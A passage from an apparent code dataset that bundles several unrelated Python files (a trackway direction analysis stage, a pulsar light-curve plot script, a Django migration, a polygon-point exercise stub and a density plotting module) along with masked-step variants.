key, owner,\n label='Trackway Direction',\n **kwargs)\n self._paths = []\n\n#===============================================================================\n# G E T / S E T\n\n#_______________________________________________________________________________\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n#_______________________________________________________________________________\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n\n#===============================================================================\n# P R O T E C T E D\n\n#_______________________________________________________________________________\n def _preAnalyze(self):\n self.owner.cache.set('trackwayDirectionData', {})\n\n#_______________________________________________________________________________\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME)\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n#_______________________________________________________________________________\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n\n bundle = self.owner.getSeriesBundle(trackway)\n\n # Create a list of window sizes to test trimmed to account for small trackways with fewer\n # points than a specified size\n maxWindowSize = min(8, int(0.5*float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n\n samples = []\n\n for i in windowSizes:\n # For each valid window size create a sample entry\n samples.append({'size':i + 1, 'values':self._sampleTrackway(trackway, i + 1) })\n\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n\n self.trackwayDirectionData[trackway.uid] = {'trackway':trackway, 'samples':samples}\n\n#_______________________________________________________________________________\n def _drawTrackwaySamples(self, sitemap, samples):\n \"\"\"_drawTrackwaySamples doc...\"\"\"\n\n drawing = sitemap.cache.get('drawing')\n\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n\n if len(sample['values']) < 2:\n continue\n\n prev = sample['values'][0].position\n\n for value in sample['values'][1:]:\n pos = value.position\n drawing.line(\n prev.toMayaTuple(), pos.toMayaTuple(),\n stroke=color, stroke_width=1, stroke_opacity='0.75')\n prev = pos\n\n for value in sample['values']:\n pos = value.position\n drawing.circle(\n pos.toMayaTuple(), 5,\n stroke='none', fill=color, fill_opacity='0.75')\n\n#_______________________________________________________________________________\n def _plotTrackwaySamples(self, trackway, samples):\n \"\"\"_plotTrackwaySamples doc...\"\"\"\n\n bundle = self.owner.getSeriesBundle(trackway)\n\n plot = MultiScatterPlot(\n title='%s Direction Sampling %s' % (trackway.name, bundle.echoStatus(asPercent=True)),\n xLabel='Trackway Curve Position (m)',\n yLabel='Direction (degrees)')\n\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n data = []\n\n for value in sample['values']:\n data.append(value.curvePoint)\n\n plot.addPlotSeries(data=data, color=color, line=True)\n\n self._paths.append(plot.save(self.getTempFilePath(extension='pdf')))\n\n#_______________________________________________________________________________\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n\n window = []\n samples = []\n\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n\n for entry in entries:\n # For each track entry in the trackways data add that to the sample window and update\n # the samples result\n\n window.append(entry)\n\n if len(window) < windowSize:\n # Don't create a sample until the sub-sample list exceeds the sample window size\n continue\n\n xTests = [] # X spatial position values\n yTests = [] # Y spatial position values\n angleTests = [] # Heading angle values\n curvePosTests = [] # Curve position values\n for item in window:\n # Calculate weighted averages for various properties of the current sample window\n\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n\n # Create a ValueUncertainty for the curve position by using the fractional\n # positional uncertainty over the spatial length of the curve\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc**2 + posValue.yUnc**2)\n curvePos = item.track.getAnalysisPair(self.analysisSession).curvePosition\n curvePosUnc = abs(posUnc/analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(curvePos, curvePosUnc))\n\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(\n x=xValue.raw, xUnc=xValue.rawUncertainty,\n y=yValue.raw, yUnc=yValue.rawUncertainty)\n\n # Remove the oldest sample from the to make room for a new sample in the next iteration\n window.pop(0)\n\n if len(samples) > 0:\n # Compare this sample to the previous one and if it does not differ\n # significantly then continue to continue to the next iteration\n last = samples[-1].directionAngle\n totalUnc = last.rawUncertainty + directionAngleMean.rawUncertainty\n deviation = abs(directionAngleMean.raw - last.raw)/totalUnc\n if deviation < 2.0:\n continue\n\n samples.append(self.SAMPLE_DATA_NT(\n directionAngle=directionAngleMean,\n position=position,\n curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.uncertainty),\n curvePosition=curvePositionMean,\n track=entry.track ))\n\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n\n#_______________________________________________________________________________\n def _extendSamplesToTrackwayStart(self, firstEntry, samples):\n \"\"\"_extendSamplesToTrackwayStart doc...\"\"\"\n\n if len(samples) < 2 or samples[0].track == firstEntry.track:\n # If there aren't enough samples, or the samples already extend to the end of the\n # trackway, return the samples without adding on an end point\n return\n\n line = LineSegment2D(\n start=samples[0].position.clone(),\n end=samples[1].position.clone())\n\n firstTrack = firstEntry.track\n analysisTrack = firstTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(firstTrack.positionValue, False)\n\n samples.insert(0, self.SAMPLE_DATA_NT(\n directionAngle=samples[0].directionAngle.clone(),\n position=position,\n curvePoint=(\n analysisTrack.curvePosition, samples[0].directionAngle.value,\n 0, samples[-1].directionAngle.uncertainty),\n curvePosition=samples[0].curvePosition.clone(),\n track=firstTrack ))\n\n#_______________________________________________________________________________\n def _extendSampleToTrackwayEnd(self, lastEntry, samples):\n\n if len(samples) < 2 or samples[-1].track == lastEntry.track:\n # If there aren't enough samples, or the samples already extend to the end of the\n # trackway, return the samples without adding on an end point\n return\n\n line = LineSegment2D(\n start=samples[-2].position.clone(),\n end=samples[-1].position.clone())\n\n lastTrack = lastEntry.track\n analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(lastTrack.positionValue, False)\n\n ha = samples[-1].directionAngle.clone()\n samples.append(self.SAMPLE_DATA_NT(\n directionAngle=ha,\n position=position,\n curvePoint=(analysisTrack.curvePosition, ha.value, 0, ha.uncertainty),\n curvePosition=samples[-1].curvePosition.clone(),\n track=lastTrack ))\n\n#_______________________________________________________________________________\n def _postAnalyze(self):\n self.mergePdfs(self._paths, 'Trackway-Direction.pdf')\n",
"step-ids": [
7,
9,
11,
13,
17
]
}
|
[
7,
9,
11,
13,
17
] |
#!/usr/bin/env python
from LCClass import LightCurve
import matplotlib.pyplot as plt
import niutils
def main():
lc1821 = LightCurve("PSR_B1821-24/PSR_B1821-24_combined.evt")
lc0218 = LightCurve("PSR_J0218+4232/PSR_J0218+4232_combined.evt")
fig, ax = plt.subplots(2, 1, figsize=(8, 8))
ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate=False)
ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False)
ax[1].set_xlabel("Pulse Phase", fontsize=25)
ax[0].text(.08, .95, r'PSR B1821$-$24', ha='left', va='top',
fontsize=20, transform=ax[0].transAxes,
bbox=dict(facecolor='white', edgecolor='none', alpha=0.6))
ax[1].text(.08, .95, r'PSR J0218$+$4232', ha='left', va='top',
fontsize=20, transform=ax[1].transAxes,
bbox=dict(facecolor='white', edgecolor='none', alpha=0.6))
ax[0].tick_params(labelbottom=False)
#plt.setp(ax[0].get_yticklabels()[0], visible=False)
fig.text(.04, .5, r'Photon Counts', ha='center', va='center',
rotation='vertical', fontsize=25)
plt.subplots_adjust(hspace=0, bottom=.08, top=.94, right=.98, left=.15)
fig.savefig("poster_plot.svg")
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "48311ee17a3f2eca8db32d7672f540fa45a7a900",
"index": 3524,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n lc1821 = LightCurve('PSR_B1821-24/PSR_B1821-24_combined.evt')\n lc0218 = LightCurve('PSR_J0218+4232/PSR_J0218+4232_combined.evt')\n fig, ax = plt.subplots(2, 1, figsize=(8, 8))\n ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate\n =False)\n ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False\n )\n ax[1].set_xlabel('Pulse Phase', fontsize=25)\n ax[0].text(0.08, 0.95, 'PSR B1821$-$24', ha='left', va='top', fontsize=\n 20, transform=ax[0].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[1].text(0.08, 0.95, 'PSR J0218$+$4232', ha='left', va='top',\n fontsize=20, transform=ax[1].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[0].tick_params(labelbottom=False)\n fig.text(0.04, 0.5, 'Photon Counts', ha='center', va='center', rotation\n ='vertical', fontsize=25)\n plt.subplots_adjust(hspace=0, bottom=0.08, top=0.94, right=0.98, left=0.15)\n fig.savefig('poster_plot.svg')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n lc1821 = LightCurve('PSR_B1821-24/PSR_B1821-24_combined.evt')\n lc0218 = LightCurve('PSR_J0218+4232/PSR_J0218+4232_combined.evt')\n fig, ax = plt.subplots(2, 1, figsize=(8, 8))\n ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate\n =False)\n ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False\n )\n ax[1].set_xlabel('Pulse Phase', fontsize=25)\n ax[0].text(0.08, 0.95, 'PSR B1821$-$24', ha='left', va='top', fontsize=\n 20, transform=ax[0].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[1].text(0.08, 0.95, 'PSR J0218$+$4232', ha='left', va='top',\n fontsize=20, transform=ax[1].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[0].tick_params(labelbottom=False)\n fig.text(0.04, 0.5, 'Photon Counts', ha='center', va='center', rotation\n ='vertical', fontsize=25)\n plt.subplots_adjust(hspace=0, bottom=0.08, top=0.94, right=0.98, left=0.15)\n fig.savefig('poster_plot.svg')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from LCClass import LightCurve\nimport matplotlib.pyplot as plt\nimport niutils\n\n\ndef main():\n lc1821 = LightCurve('PSR_B1821-24/PSR_B1821-24_combined.evt')\n lc0218 = LightCurve('PSR_J0218+4232/PSR_J0218+4232_combined.evt')\n fig, ax = plt.subplots(2, 1, figsize=(8, 8))\n ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate\n =False)\n ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False\n )\n ax[1].set_xlabel('Pulse Phase', fontsize=25)\n ax[0].text(0.08, 0.95, 'PSR B1821$-$24', ha='left', va='top', fontsize=\n 20, transform=ax[0].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[1].text(0.08, 0.95, 'PSR J0218$+$4232', ha='left', va='top',\n fontsize=20, transform=ax[1].transAxes, bbox=dict(facecolor='white',\n edgecolor='none', alpha=0.6))\n ax[0].tick_params(labelbottom=False)\n fig.text(0.04, 0.5, 'Photon Counts', ha='center', va='center', rotation\n ='vertical', fontsize=25)\n plt.subplots_adjust(hspace=0, bottom=0.08, top=0.94, right=0.98, left=0.15)\n fig.savefig('poster_plot.svg')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n\nfrom LCClass import LightCurve\nimport matplotlib.pyplot as plt\nimport niutils\n\ndef main():\n lc1821 = LightCurve(\"PSR_B1821-24/PSR_B1821-24_combined.evt\")\n lc0218 = LightCurve(\"PSR_J0218+4232/PSR_J0218+4232_combined.evt\")\n\n fig, ax = plt.subplots(2, 1, figsize=(8, 8))\n\n ax[0], _ = lc1821.fit_two('lorentzian', ax=ax[0], label=False, annotate=False)\n ax[1], _ = lc0218.fit_two('gaussian', ax=ax[1], label=False, annotate=False)\n\n ax[1].set_xlabel(\"Pulse Phase\", fontsize=25)\n ax[0].text(.08, .95, r'PSR B1821$-$24', ha='left', va='top', \n fontsize=20, transform=ax[0].transAxes,\n bbox=dict(facecolor='white', edgecolor='none', alpha=0.6))\n ax[1].text(.08, .95, r'PSR J0218$+$4232', ha='left', va='top', \n fontsize=20, transform=ax[1].transAxes,\n bbox=dict(facecolor='white', edgecolor='none', alpha=0.6))\n\n ax[0].tick_params(labelbottom=False)\n #plt.setp(ax[0].get_yticklabels()[0], visible=False)\n \n fig.text(.04, .5, r'Photon Counts', ha='center', va='center',\n rotation='vertical', fontsize=25)\n\n plt.subplots_adjust(hspace=0, bottom=.08, top=.94, right=.98, left=.15)\n\n fig.savefig(\"poster_plot.svg\")\n\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 3.2 on 2021-06-28 04:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rrhh', '0014_alter_detallepermiso_fecha_permiso'),
]
operations = [
migrations.AlterField(
model_name='permiso',
name='mes',
field=models.CharField(choices=[('01', 'ENERO'), ('02', 'FEBRERO'), ('03', 'MARZO'), ('04', 'ABRIL'), ('05', 'MAYO'), ('06', 'JUNIO'), ('07', 'JULIO'), ('08', 'AGOSTO'), ('09', 'SEPTIEMBRE'), ('10', 'OCTUBRE'), ('11', 'NOVIEMBRE'), ('12', 'DICIEMBRE')], max_length=2),
),
]
|
normal
|
{
"blob_id": "5db450424dc143443839e24801ece444d0d7e162",
"index": 3611,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('rrhh', '0014_alter_detallepermiso_fecha_permiso')]\n operations = [migrations.AlterField(model_name='permiso', name='mes',\n field=models.CharField(choices=[('01', 'ENERO'), ('02', 'FEBRERO'),\n ('03', 'MARZO'), ('04', 'ABRIL'), ('05', 'MAYO'), ('06', 'JUNIO'),\n ('07', 'JULIO'), ('08', 'AGOSTO'), ('09', 'SEPTIEMBRE'), ('10',\n 'OCTUBRE'), ('11', 'NOVIEMBRE'), ('12', 'DICIEMBRE')], max_length=2))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('rrhh', '0014_alter_detallepermiso_fecha_permiso')]\n operations = [migrations.AlterField(model_name='permiso', name='mes',\n field=models.CharField(choices=[('01', 'ENERO'), ('02', 'FEBRERO'),\n ('03', 'MARZO'), ('04', 'ABRIL'), ('05', 'MAYO'), ('06', 'JUNIO'),\n ('07', 'JULIO'), ('08', 'AGOSTO'), ('09', 'SEPTIEMBRE'), ('10',\n 'OCTUBRE'), ('11', 'NOVIEMBRE'), ('12', 'DICIEMBRE')], max_length=2))]\n",
"step-5": "# Generated by Django 3.2 on 2021-06-28 04:32\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rrhh', '0014_alter_detallepermiso_fecha_permiso'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='permiso',\n name='mes',\n field=models.CharField(choices=[('01', 'ENERO'), ('02', 'FEBRERO'), ('03', 'MARZO'), ('04', 'ABRIL'), ('05', 'MAYO'), ('06', 'JUNIO'), ('07', 'JULIO'), ('08', 'AGOSTO'), ('09', 'SEPTIEMBRE'), ('10', 'OCTUBRE'), ('11', 'NOVIEMBRE'), ('12', 'DICIEMBRE')], max_length=2),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/home/porosya/.local/share/virtualenvs/checkio-VEsvC6M1/bin/checkio --domain=py run inside-block
# https://py.checkio.org/mission/inside-block/
# When it comes to city planning it's import to understand the borders of various city structures. Parks, lakes or living blocks can be represented as closed polygon and can be described using cartesian coordinates on a map . We need functionality to determine is a point (a building or a tree) lies inside the structure.
#
# For the purpose of this mission, a city structure may be considered a polygon represented as a sequence of vertex coordinates on a plane or map. The vertices are connected sequentially with the last vertex in the list connecting to the first. We are given the coordinates of the point which we need to check. If the point of impact lies on the edge of the polygon then it should be considered inside it. For this mission, you need to determine whether the given point lies inside the polygon.
#
#
# END_DESC
def is_inside(polygon, point):
return True or False
if __name__ == '__main__':
assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)),
(2, 2)) == True, "First"
assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)),
(4, 2)) == False, "Second"
assert is_inside(((1, 1), (4, 1), (2, 3)),
(3, 2)) == True, "Third"
assert is_inside(((1, 1), (4, 1), (1, 3)),
(3, 3)) == False, "Fourth"
assert is_inside(((2, 1), (4, 1), (5, 3), (3, 4), (1, 3)),
(4, 3)) == True, "Fifth"
assert is_inside(((2, 1), (4, 1), (3, 2), (3, 4), (1, 3)),
(4, 3)) == False, "Sixth"
assert is_inside(((1, 1), (3, 2), (5, 1), (4, 3), (5, 5), (3, 4), (1, 5), (2, 3)),
(3, 3)) == True, "Seventh"
assert is_inside(((1, 1), (1, 5), (5, 5), (5, 4), (2, 4), (2, 2), (5, 2), (5, 1)),
(4, 3)) == False, "Eighth"
|
normal
|
{
"blob_id": "548c4dbfc1456fead75c22927ae7c6224fafeace",
"index": 7893,
"step-1": "<mask token>\n",
"step-2": "def is_inside(polygon, point):\n return True or False\n\n\n<mask token>\n",
"step-3": "def is_inside(polygon, point):\n return True or False\n\n\nif __name__ == '__main__':\n assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)), (2, 2)) == True, 'First'\n assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)), (4, 2)\n ) == False, 'Second'\n assert is_inside(((1, 1), (4, 1), (2, 3)), (3, 2)) == True, 'Third'\n assert is_inside(((1, 1), (4, 1), (1, 3)), (3, 3)) == False, 'Fourth'\n assert is_inside(((2, 1), (4, 1), (5, 3), (3, 4), (1, 3)), (4, 3)\n ) == True, 'Fifth'\n assert is_inside(((2, 1), (4, 1), (3, 2), (3, 4), (1, 3)), (4, 3)\n ) == False, 'Sixth'\n assert is_inside(((1, 1), (3, 2), (5, 1), (4, 3), (5, 5), (3, 4), (1, 5\n ), (2, 3)), (3, 3)) == True, 'Seventh'\n assert is_inside(((1, 1), (1, 5), (5, 5), (5, 4), (2, 4), (2, 2), (5, 2\n ), (5, 1)), (4, 3)) == False, 'Eighth'\n",
"step-4": "#!/home/porosya/.local/share/virtualenvs/checkio-VEsvC6M1/bin/checkio --domain=py run inside-block\n\n# https://py.checkio.org/mission/inside-block/\n\n# When it comes to city planning it's import to understand the borders of various city structures. Parks, lakes or living blocks can be represented as closed polygon and can be described using cartesian coordinates on a map . We need functionality to determine is a point (a building or a tree) lies inside the structure.\n# \n# For the purpose of this mission, a city structure may be considered a polygon represented as a sequence of vertex coordinates on a plane or map. The vertices are connected sequentially with the last vertex in the list connecting to the first. We are given the coordinates of the point which we need to check. If the point of impact lies on the edge of the polygon then it should be considered inside it. For this mission, you need to determine whether the given point lies inside the polygon.\n# \n# \n# END_DESC\n\ndef is_inside(polygon, point):\n return True or False\n\n\nif __name__ == '__main__':\n assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)),\n (2, 2)) == True, \"First\"\n assert is_inside(((1, 1), (1, 3), (3, 3), (3, 1)),\n (4, 2)) == False, \"Second\"\n assert is_inside(((1, 1), (4, 1), (2, 3)),\n (3, 2)) == True, \"Third\"\n assert is_inside(((1, 1), (4, 1), (1, 3)),\n (3, 3)) == False, \"Fourth\"\n assert is_inside(((2, 1), (4, 1), (5, 3), (3, 4), (1, 3)),\n (4, 3)) == True, \"Fifth\"\n assert is_inside(((2, 1), (4, 1), (3, 2), (3, 4), (1, 3)),\n (4, 3)) == False, \"Sixth\"\n assert is_inside(((1, 1), (3, 2), (5, 1), (4, 3), (5, 5), (3, 4), (1, 5), (2, 3)),\n (3, 3)) == True, \"Seventh\"\n assert is_inside(((1, 1), (1, 5), (5, 5), (5, 4), (2, 4), (2, 2), (5, 2), (5, 1)),\n (4, 3)) == False, \"Eighth\"",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
Kernel desnity estimation plots for geochemical data.
"""
import copy
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.ticker import MaxNLocator
from ...comp.codata import close
from ...util.log import Handle
from ...util.meta import get_additional_params, subkwargs
from ...util.plot.axes import add_colorbar, init_axes
from ...util.plot.density import (
get_axis_density_methods,
percentile_contour_values_from_meshz,
plot_Z_percentiles,
)
from ...util.plot.style import DEFAULT_CONT_COLORMAP
from .grid import DensityGrid
from .ternary import ternary_heatmap
logger = Handle(__name__)
def density(
arr,
ax=None,
logx=False,
logy=False,
bins=25,
mode="density",
extent=None,
contours=[],
percentiles=True,
relim=True,
cmap=DEFAULT_CONT_COLORMAP,
shading="auto",
vmin=0.0,
colorbar=False,
**kwargs
):
"""
Creates diagramatic representation of data density and/or frequency for either
binary diagrams (X-Y) or ternary plots.
Additional arguments are typically forwarded
to respective :mod:`matplotlib` functions
:func:`~matplotlib.pyplot.pcolormesh`,
:func:`~matplotlib.pyplot.hist2d`,
:func:`~matplotlib.pyplot.hexbin`,
:func:`~matplotlib.pyplot.contour`, and
:func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).
Parameters
----------
arr : :class:`numpy.ndarray`
Dataframe from which to draw data.
ax : :class:`matplotlib.axes.Axes`, `None`
The subplot to draw on.
logx : :class:`bool`, `False`
Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.
logy : :class:`bool`, `False`
Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.
bins : :class:`int`, 20
Number of bins used in the gridded functions (histograms, KDE evaluation grid).
mode : :class:`str`, 'density'
Different modes used here: ['density', 'hexbin', 'hist2d']
extent : :class:`list`
Predetermined extent of the grid for which to from the histogram/KDE. In the
general form (xmin, xmax, ymin, ymax).
contours : :class:`list`
Contours to add to the plot, where :code:`mode='density'` is used.
percentiles : :class:`bool`, `True`
Whether contours specified are to be converted to percentiles.
relim : :class:`bool`, :code:`True`
Whether to relimit the plot based on xmin, xmax values.
cmap : :class:`matplotlib.colors.Colormap`
Colormap for mapping surfaces.
vmin : :class:`float`, 0.
Minimum value for colormap.
shading : :class:`str`, 'auto'
Shading to apply to pcolormesh.
colorbar : :class:`bool`, False
Whether to append a linked colorbar to the generated mappable image.
{otherparams}
Returns
-------
:class:`matplotlib.axes.Axes`
Axes on which the densityplot is plotted.
.. seealso::
Functions:
:func:`matplotlib.pyplot.pcolormesh`
:func:`matplotlib.pyplot.hist2d`
:func:`matplotlib.pyplot.contourf`
Notes
-----
The default density estimates and derived contours are generated based on
kernel density estimates. Assumptions around e.g. 95% of points lying within
a 95% contour won't necessarily be valid for non-normally distributed data
(instead, this represents the approximate 95% percentile on the kernel
density estimate). Note that contours are currently only generated; for
`mode="density"`; future updates may allow the use of a histogram
basis, which would give results closer to 95% data percentiles.
Todo
----
* Allow generation of contours from histogram data, rather than just
the kernel density estimate.
* Implement an option and filter to 'scatter' points below the minimum threshold
or maximum percentile contours.
"""
if (mode == "density") & np.isclose(vmin, 0.0): # if vmin is not specified
vmin = 0.02 # 2% max height | 98th percentile
if arr.shape[-1] == 3:
projection = "ternary"
else:
projection = None
ax = init_axes(ax=ax, projection=projection, **kwargs)
pcolor, contour, contourf = get_axis_density_methods(ax)
background_color = (*ax.patch.get_facecolor()[:-1], 0.0)
if cmap is not None:
if isinstance(cmap, str):
cmap = plt.get_cmap(cmap)
cmap = copy.copy(cmap) # without this, it would modify the global cmap
cmap.set_under((1, 1, 1, 0))
if mode == "density":
cbarlabel = "Kernel Density Estimate"
else:
cbarlabel = "Frequency"
valid_rows = np.isfinite(arr).all(axis=-1)
if (mode in ["hexbin", "hist2d"]) and contours:
raise NotImplementedError(
"Contours are not currently implemented for 'hexbin' or 'hist2d' modes."
)
if (arr.size > 0) and valid_rows.any():
# Data can't be plotted if there's any nans, so we can exclude these
arr = arr[valid_rows]
if projection is None: # binary
x, y = arr.T
grid = DensityGrid(
x,
y,
bins=bins,
logx=logx,
logy=logy,
extent=extent,
**subkwargs(kwargs, DensityGrid)
)
if mode == "hexbin":
# extent values are exponents (i.e. 3 -> 10**3)
mappable = ax.hexbin(
x,
y,
gridsize=bins,
cmap=cmap,
extent=grid.get_hex_extent(),
xscale=["linear", "log"][logx],
yscale=["linear", "log"][logy],
**subkwargs(kwargs, ax.hexbin)
)
elif mode == "hist2d":
_, _, _, im = ax.hist2d(
x,
y,
bins=[grid.grid_xe, grid.grid_ye],
range=grid.get_range(),
cmap=cmap,
cmin=[0, 1][vmin > 0],
**subkwargs(kwargs, ax.hist2d)
)
mappable = im
elif mode == "density":
zei = grid.kdefrom(
arr,
xtransform=[lambda x: x, np.log][logx],
ytransform=[lambda y: y, np.log][logy],
mode="edges",
**subkwargs(kwargs, grid.kdefrom)
)
if percentiles: # 98th percentile
vmin = percentile_contour_values_from_meshz(zei, [1.0 - vmin])[1][0]
logger.debug(
"Updating `vmin` to percentile equiv: {:.2f}".format(vmin)
)
if not contours:
# pcolormesh using bin edges
mappable = pcolor(
grid.grid_xei,
grid.grid_yei,
zei,
cmap=cmap,
vmin=vmin,
shading=shading,
**subkwargs(kwargs, pcolor)
)
mappable.set_edgecolor(background_color)
mappable.set_linestyle("None")
mappable.set_lw(0.0)
else:
mappable = _add_contours(
grid.grid_xei,
grid.grid_yei,
zi=zei.reshape(grid.grid_xei.shape),
ax=ax,
contours=contours,
percentiles=percentiles,
cmap=cmap,
vmin=vmin,
**kwargs
)
if relim and (extent is not None):
ax.axis(extent)
elif projection == "ternary": # ternary
if shading == "auto":
shading = "flat" # auto cant' be passed to tripcolor
# zeros make nans in this case, due to the heatmap calculations
arr[~(arr > 0).all(axis=1), :] = np.nan
arr = close(arr)
if mode == "hexbin":
raise NotImplementedError
# density, histogram etc parsed here
coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)
if percentiles: # 98th percentile
vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1][0]
logger.debug("Updating `vmin` to percentile equiv: {:.2f}".format(vmin))
# remove coords where H==0, as ax.tripcolor can't deal with variable alpha :'(
fltr = (zi != 0) & (zi >= vmin)
coords = coords[fltr.flatten(), :]
zi = zi[fltr]
if not contours:
tri_poly_collection = pcolor(
*coords.T,
zi.flatten(),
cmap=cmap,
vmin=vmin,
shading=shading,
**subkwargs(kwargs, pcolor)
)
mappable = tri_poly_collection
else:
mappable = _add_contours(
*coords.T,
zi=zi.flatten(),
ax=ax,
contours=contours,
percentiles=percentiles,
cmap=cmap,
vmin=vmin,
**kwargs
)
ax.set_aspect("equal")
else:
if not arr.ndim in [0, 1, 2]:
raise NotImplementedError
if colorbar:
cbkwargs = kwargs.copy()
cbkwargs["label"] = cbarlabel
add_colorbar(mappable, **cbkwargs)
return ax
def _add_contours(
*coords,
zi=None,
ax=None,
contours=[],
cmap=DEFAULT_CONT_COLORMAP,
vmin=0.0,
extent=None,
**kwargs
):
"""
Add density-based contours to a plot.
"""
# get the contour levels
percentiles = kwargs.pop("percentiles", True)
levels = contours or kwargs.get("levels", None)
pcolor, contour, contourf = get_axis_density_methods(ax)
if percentiles and not isinstance(levels, int):
# plot individual percentile contours
_cs = plot_Z_percentiles(
*coords,
zi=zi,
ax=ax,
percentiles=levels,
extent=extent,
cmap=cmap,
**kwargs
)
mappable = _cs
else:
# plot interval contours
if levels is None:
levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())
elif isinstance(levels, int):
levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())
else:
raise NotImplementedError
# filled contours
mappable = contourf(
*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=vmin, **kwargs
)
# contours
contour(
*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=vmin, **kwargs
)
return mappable
_add_additional_parameters = True
density.__doc__ = density.__doc__.format(
otherparams=[
"",
get_additional_params(
density,
plt.pcolormesh,
plt.hist2d,
plt.hexbin,
plt.contour,
plt.contourf,
header="Other Parameters",
indent=4,
subsections=True,
),
][_add_additional_parameters]
)
|
normal
|
{
"blob_id": "ae475dc95c6a099270cf65d4b471b4b430f02303",
"index": 8840,
"step-1": "<mask token>\n",
